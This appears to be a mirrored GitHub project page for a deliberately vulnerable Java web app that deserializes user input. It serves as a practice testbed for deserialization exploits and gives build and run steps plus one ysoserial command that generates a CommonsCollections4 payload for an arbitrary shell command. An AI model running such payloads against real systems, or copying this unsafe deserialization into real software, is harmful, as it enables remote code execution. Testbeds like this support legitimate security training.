项目作者: hvqzao

项目描述 :
Vulnerable webapp testbed
高级语言: Java
项目地址: git://github.com/hvqzao/java-deserialize-webapp.git
创建时间: 2016-05-06T19:29:04Z
项目社区:https://github.com/hvqzao/java-deserialize-webapp

开源协议:MIT License

下载


java-deserialize-webapp

This application will attempt to java deserialize user provided input. commons-collections4:4.0 is on classpath and it can be used for playing around with exploitation.

deserialize

Building

(already done)

  1. mvn clean package

Running

By default, application binds to 0.0.0.0:8000 (to bind to localhost, edit src/main/java/hvqzao/java/deserialize/webapp/embedded/Server.java file and rebuild the project).

Linux:

  1. git clone https://github.com/hvqzao/java-deserialize-webapp
  2. cd java-deserialize-webapp
  3. sh target/bin/webapp

Windows:

  1. git clone https://github.com/hvqzao/java-deserialize-webapp
  2. cd java-deserialize-webapp
  3. start target/bin/webapp.bat

Example attack

  1. java -jar ysoserial-0.0.4-all.jar CommonsCollections4 'shell command...' | base64 | tr -d "\n"

Payload must also be properly url-encoded.

License

MIT License